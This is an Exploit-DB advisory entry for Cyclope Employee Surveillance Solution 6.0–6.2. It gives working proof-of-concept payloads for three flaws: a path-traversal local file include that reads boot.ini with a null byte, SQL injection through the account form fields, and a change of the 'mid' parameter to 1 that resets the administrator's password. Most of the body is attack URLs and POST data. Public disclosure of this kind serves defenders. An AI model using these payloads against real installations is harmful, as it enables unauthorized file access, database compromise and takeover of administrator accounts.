Cyclope Employee Surveillance Solution 6.0 6.1.0 6.2.0 - Multiple Vulnerabilities

2012-08-15T00:00:00
ID EDB-ID:20545
Type exploitdb
Reporter loneferret
Modified 2012-08-15T00:00:00

Description

Cyclope Employee Surveillance Solution 6.0 6.1.0 6.2.0 - Multiple Vulnerabilities. Webapps exploit for windows platform

                                        
                                            # Author: loneferret of Offensive Security
# Product: Cyclope Employee Surveillance Solution v6.0
# Version: 6.1.0 & 6.2.0
# Vendor Site: http://www.cyclope-series.com/
# Software Download: http://www.cyclope-series.com/download/index.html

# Software description:
# The employee monitoring software developed by Cyclope-Series is specially designed to inform
# and equip management with statistics relating to the productivity of staff within their organization.

# Vulnerability PoC 1:
# Local File Include
#
# Requirements: Employee access
# PoC:
# http://172.16.194.134:7879/help.php?pag=../../../../../../boot.ini%00

# Vulnerability PoC 2:
# SQL Injection
# Requirements: Employee access
#
# http://172.16.194.134:7879/index.php?pag=myaccount
# -Fields affected in form:
# -First Name
# -Last Name
# -Password / Re-Type Password
# -Email
# -mid
# Poc:
# mid=15&act=member-account&pag=myaccount&first_name=john&last_name=Doe&password=123456&password2=123456&email='
# mid=15'&act=member-account&pag=myaccount&first_name=john&last_name=Doe&password=123456&password2=123456&email=
# and so on...

# Vulnerability PoC 3:
# Change Admin account's password.
# Requirements: Employee access
# http://172.16.194.134:7879/index.php?pag=myaccount
#
# Using a tool such as Tamper Data or Live HTTP Headers, change the value
# of 'mid' to 1
# PoC:
# Post Data: mid=1&act=member-account&pag=myaccount&first_name=john&last_name=Doe&password=123456&password2=123456&email=